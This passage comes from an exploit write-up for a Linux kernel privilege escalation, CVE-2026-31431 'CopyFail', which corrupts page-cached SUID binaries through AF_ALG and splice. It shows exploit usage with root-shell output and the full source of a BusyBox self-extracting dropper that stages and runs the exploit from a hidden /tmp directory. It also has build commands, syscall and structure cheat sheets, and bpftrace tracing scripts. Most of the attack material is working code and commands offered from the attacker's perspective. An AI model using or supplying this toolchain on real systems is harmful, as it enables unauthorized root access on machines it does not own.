socket → bind → setsockopt → accept → sendmsg → splice → recvfrom
The canonical implementation is in the artifact repo: exploit-scripts/exploit.pl.
Usage:
perl exploit.pl
perl exploit.pl /usr/bin/su ./payload.pwnkit.elf
DEBUG=1 perl exploit.pl # prints per-chunk overwrite
We can specify a victim SUID binary and the ELF payload (e.g. payload.pwnkit.elf from 7.3.1.1) that should run with root privileges:
axura@pwnlab:~/lab/copy-fail$ perl exploit.pl /usr/bin/passwd payload.pwnkit.elf
[+] target : /usr/bin/passwd
[+] payload : 376 bytes from payload.pwnkit.elf
[+] strategy : 4-byte writes via AAD[4:8] -> authencesn() scratch write
[+] payload staged into page cache, executing target...
# id
uid=0(root) gid=1000(axura) groups=1000(axura),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin)
# whoami
root
7.6 BusyBox-only Exploit
There is an important limit here: a pure BusyBox shell script cannot directly perform the full exploit primitive. The exploit needs socket(AF_ALG), setsockopt(), sendmsg() with ancillary control messages, splice(), and recvfrom(). BusyBox applets do not expose that syscall shape.
So a realistic BusyBox-only path is a self-extracting runner:
- build the syscall exploit once, for example the assembly version from 7.4
- build the compact payload.pwnkit.elf from 7.3.1.1
- pack both files into one BusyBox-compatible shell script
- on the target, the script uses only BusyBox sh and printf to reconstruct the files under /tmp, then runs the exploit
This is useful on constrained systems where BusyBox is present but Python, Perl, gcc, nasm, and package managers are not.
The packer is kept in the artifact repo as exploit-scripts/mk_busybox_dropper.sh:
#!/bin/sh
#
# Build a BusyBox-compatible self-extracting CopyFail runner.
#
# Usage:
# sh mk_busybox_dropper.sh ./exploit_asm ./payload.pwnkit.elf > copyfail-busybox.sh
# busybox sh copyfail-busybox.sh /usr/bin/su
#
# The generated script uses only common BusyBox applets: sh, printf, chmod,
# mkdir, rm, cd, and exec.
set -eu
if [ "$#" -ne 2 ]; then
echo "usage: $0 <exploit_asm> <payload.pwnkit.elf>" >&2
exit 1
fi
exploit_bin=$1
payload_elf=$2
[ -r "$exploit_bin" ] || { echo "cannot read exploit binary: $exploit_bin" >&2; exit 1; }
[ -r "$payload_elf" ] || { echo "cannot read payload ELF: $payload_elf" >&2; exit 1; }
emit_file() {
src=$1
dst=$2
printf "write_blob \"%s\" <<'__COPYFAIL_BLOB__'\n" "$dst"
od -An -tx1 -v "$src" |
awk '
{
for (i = 1; i <= NF; i++) {
buf = buf "\\x" $i
if (length(buf) >= 192) {
print buf
buf = ""
}
}
}
END {
if (length(buf))
print buf
}'
printf "__COPYFAIL_BLOB__\n"
}
cat <<'EOF'
#!/bin/sh
set -eu
d=${TMPDIR:-/tmp}/.copyfail.$$
mkdir "$d" || exit 1
trap 'rm -rf "$d"' EXIT HUP INT TERM
umask 077
write_blob() {
out=$1
: > "$out"
while IFS= read -r line; do
[ "$line" = "__COPYFAIL_BLOB__" ] && break
printf '%b' "$line" >> "$out"
done
}
EOF
emit_file "$exploit_bin" '$d/exploit_asm'
emit_file "$payload_elf" '$d/payload.pwnkit.elf'
cat <<'EOF'
chmod 700 "$d/exploit_asm"
cd "$d"
exec ./exploit_asm "${1:-/usr/bin/su}"
EOF
Generate the BusyBox artifact on a build-capable lab machine:
nasm -f elf64 exploit.asm -o exploit.o
ld -o exploit_asm exploit.o
sh mk_busybox_dropper.sh ./exploit_asm ./payload.pwnkit.elf > copyfail-busybox.sh
chmod +x copyfail-busybox.sh
Then run the generated artifact on the constrained target:
busybox sh ./copyfail-busybox.sh /usr/bin/su
Pwned:
axura@pwnlab:~/lab/copy-fail$ sh mk_busybox_dropper.sh ./exploit_asm ./payload.pwnkit.elf > copyfail-busybox.sh
axura@pwnlab:~/lab/copy-fail$ chmod +x copyfail-busybox.sh
axura@pwnlab:~/lab/copy-fail$ busybox sh ./copyfail-busybox.sh /usr/bin/su
[+] target : /usr/bin/su
[+] payload staged into page cache, executing target...
# id
uid=0(root) gid=1000(axura) groups=1000(axura),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),100(users),114(lpadmin)
# whoami
root
The generated script writes two files into a private temporary directory (under /tmp when TMPDIR is unset):
$TMPDIR/.copyfail.$$/exploit_asm
$TMPDIR/.copyfail.$$/payload.pwnkit.elf
Then it changes into that directory and executes:
./exploit_asm /usr/bin/su
This keeps the target-side dependency set small. The target does not need nasm, ld, gcc, Python, Perl, base64, xxd, or uudecode; the generated script only relies on BusyBox shell behavior and printf '%b' handling \xNN byte escapes.
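To make the text encoding concrete, the following Python sketch models the line format that the packer's od and awk pipeline emits and the decoding that printf '%b' is relied on to perform. It is an illustrative model under stated assumptions, not part of the artifact repo: the function names are hypothetical, and the decoder handles only the \xNN form used here rather than the full set of '%b' escapes.

```python
import re


def to_escape_lines(data: bytes, max_len: int = 192) -> list[str]:
    """Encode bytes as lines of literal \\xNN escapes (hypothetical helper).

    Mirrors the awk loop: append one escape per byte and flush the buffer
    once it reaches max_len characters (192 chars = 48 bytes per line).
    """
    lines, buf = [], ""
    for b in data:
        buf += f"\\x{b:02x}"
        if len(buf) >= max_len:
            lines.append(buf)
            buf = ""
    if buf:
        lines.append(buf)
    return lines


def from_escape_lines(lines: list[str]) -> bytes:
    """Decode lines of \\xNN escapes back to raw bytes (only this form)."""
    out = bytearray()
    for line in lines:
        for hex_pair in re.findall(r"\\x([0-9a-f]{2})", line):
            out.append(int(hex_pair, 16))
    return bytes(out)


if __name__ == "__main__":
    blob = bytes(range(256))
    encoded = to_escape_lines(blob)
    assert from_escape_lines(encoded) == blob
    print(len(encoded), "lines, first line length", len(encoded[0]))
```

Because every byte becomes four printable characters, the generated script is roughly four times the size of the two binaries it carries; that is the cost of avoiding base64, xxd, and uudecode on the target.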
8 Appendix
The companion scripts, exploit variants, and tracing helpers referenced throughout this writeup are collected in the artifact repo: 4xura/CVE-2026-31431-CopyFail.
8.1 Kernel Source References
| Keyword | Why it matters |
|---|---|
| filemap_splice_read() | regular file bytes enter the splice path from page cache |
| splice_folio_into_pipe() | a cached file folio becomes a pipe-backed page reference |
| do_splice() | generic splice dispatcher |
| struct pipe_buffer | metadata object that carries the spliced page |
| alg_bind() | resolves sockaddr_alg into the requested AF_ALG family |
| af_alg_sendmsg() | imports AAD and MSG_SPLICE_PAGES input into AF_ALG |
| extract_iter_to_sg() | converts the page-backed iterator into TX scatterlist entries |
| aead_sendmsg() | AEAD socket wrapper above af_alg_sendmsg() |
| _aead_recvmsg() | builds the final decrypt request layout |
| struct aead_request | final crypto-layer request object |
| crypto_authenc_esn_decrypt() | vulnerable decrypt callback |
| scatterwalk_map_and_copy() | walker that performs the destination-side scratch write |
| crypto_authenc_extractkeys() | parses the authenc key blob used by ALG_SET_KEY |
8.2 Important Structures Cheat Sheet
| Keyword | Role in this bug |
|---|---|
| struct address_space | per-file page-cache mapping |
| struct inode | owns i_mapping / cached file state |
| struct pipe_inode_info | ring of pipe buffers |
| struct pipe_buffer | page-backed slot moved through splice |
| struct sockaddr_alg | selects aead and authencesn(...) |
| struct msghdr | carries AAD and AF_ALG control messages |
| struct cmsghdr | wraps ALG_SET_OP, ALG_SET_IV, ALG_SET_AEAD_ASSOCLEN |
| struct af_alg_iv | 16-byte IV wrapper for ALG_SET_IV |
| struct aead_request | final decrypt request submitted to crypto core |
| struct scatterlist | chained request layout behind RX/TX buffers |
8.3 Syscall Cheat Sheet
| Syscall / API | Used for |
|---|---|
| socket(AF_ALG, SOCK_SEQPACKET, 0) | open crypto transform socket |
| bind() | select authencesn(hmac(sha256),cbc(aes)) |
| setsockopt(ALG_SET_KEY) | install valid authenc key blob |
| setsockopt(ALG_SET_AEAD_AUTHSIZE) | set authsize = 4 |
| accept() | create AEAD operation socket |
| sendmsg() | queue AAD and AF_ALG control messages |
| pipe() | create splice bridge |
| splice(file -> pipe) | import target file page |
| splice(pipe -> socket) | hand page-backed data to AF_ALG |
| recv() / recvfrom() | trigger decrypt path and scratch write |
| execve() | execute corrupted cached target |
8.4 Bpftrace Scripts
Check probe availability first:
sudo cat /proc/kallsyms | grep -E \
'filemap_splice_read|splice_folio_into_pipe|af_alg_sendmsg|extract_iter_to_sg|crypto_authenc_esn_decrypt|scatterwalk_map_and_copy'
File page enters page-cache splice path:
bpftrace-scripts/bpftrace-filemap-splice.bt
sudo bpftrace ./bpftrace-scripts/bpftrace-filemap-splice.bt
Pipe data reaches AF_ALG:
bpftrace-scripts/bpftrace-af-alg-sendmsg.bt
sudo bpftrace ./bpftrace-scripts/bpftrace-af-alg-sendmsg.bt
Vulnerable decrypt callback runs:
bpftrace-scripts/bpftrace-authencesn-decrypt.bt
sudo bpftrace ./bpftrace-scripts/bpftrace-authencesn-decrypt.bt
8.5 Mitigation
For mitigation guidance, see Copy Fail — CVE-2026-31431; this writeup focuses on the attacker's perspective.